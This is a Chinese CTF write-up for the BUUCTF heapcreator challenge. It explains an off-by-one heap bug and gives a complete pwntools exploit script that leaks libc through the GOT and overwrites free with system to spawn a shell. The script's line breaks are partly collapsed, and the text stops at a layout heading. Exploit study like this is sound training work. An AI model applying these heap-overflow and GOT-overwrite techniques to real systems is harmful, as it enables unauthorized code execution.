BUUCTF--hitcontraining

BUUCTF--hitcontraining_heapcreator1

老规矩上来看保护：

64位架构并且除了PIE全开。接着黑盒测试下场景：

菜单题不用想就是堆。接着我们我们看看IDA中的逻辑：

程序的主要逻辑是增删改查。我们看看创建堆的过程：

注释我已给出，步骤大概如下：

1.创建一个索引堆，大小为0x10，前八个字节放Size，后八个字节放用户开辟的堆地址。

2.创建用户要求大小的堆，用户存放用户数据。

下面测试一下创建一个大小为0x10的堆，输入数据aaaaa：

下面我们看下释放堆快的代码：

我们看到释放堆快这里没有什么问题，也不存在UAF漏洞。接下来我们看看改堆快内容的代码逻辑：

在edit中我们找到了漏洞所在。show的代码我们就不看了一般是用来泄露地址的。因此我们就需要利用Off-by-one，来伪造一个chunk。以此来达到我们的目的。

根据上述代码逻辑，我们的漏洞利用思路如下：

1.申请三个大小一样的chunk，分别为chunk0,chunk1,chunk2。

2.接着修改chunk0的内容填入bin/sh作为后续system的参数，利用off-by-one并修改下一个索引chunk的大小为0x81（覆盖的是chunk1的索引堆）。

3.将chunk1释放掉，并申请回来此时我们将拥有0x80大小的空间任我们写入。并能够在chunk1的索引堆上修改用户堆地址为我们可利用的got表项。

4.通过show泄露got表地址，并计算libc的基地址,并得出system的地址

5.利用read_input函数将system的地址写入free的got表中

6.触发利用

exp如下：

#!/usr/bin/env python
# -*- coding: utf-8 -*-from pwn import *#r = remote('node5.buuoj.cn',28780)
r = process("./heapcreator")
elf = ELF("./heapcreator")
libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so") #这是我本地的，要用你自己本地的或者题目提供的
context.log_level='debug'def add(size,content):r.sendlineafter("choice :",'1')r.sendlineafter("Heap : ",str(size))r.sendlineafter("heap:",content)def edit(idx,content):r.sendlineafter("choice :",'2')r.sendlineafter("Index :",str(idx))r.sendlineafter("heap : ",content)def show(idx):r.sendlineafter("choice :",'3')r.sendlineafter("Index :",str(idx))def delete(idx):r.sendlineafter("choice :",'4')r.sendlineafter("Index :",str(idx))free_got = elf.got['free']add(0x18,"aaaaa")   #这里不能用0x10 程序会奔溃 0x18效果是一样的
add(0x10,"aaaaa")
add(0x10,"aaaaa")
#gdb.attach(r)#pause()edit(0,b'/bin/sh\x00'+p64(0)*2+b'\x81')delete(1)add(0x70,p64(0)*8+p64(0x8)+p64(free_got))free_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))base_addr = free_addr - libc.symbols['free']
system_addr = base_addr + libc.symbols['system']edit(2,p64(system_addr))delete(0)r.interactive()

下面我们看看具体的布局：

申请三个大小一样的堆：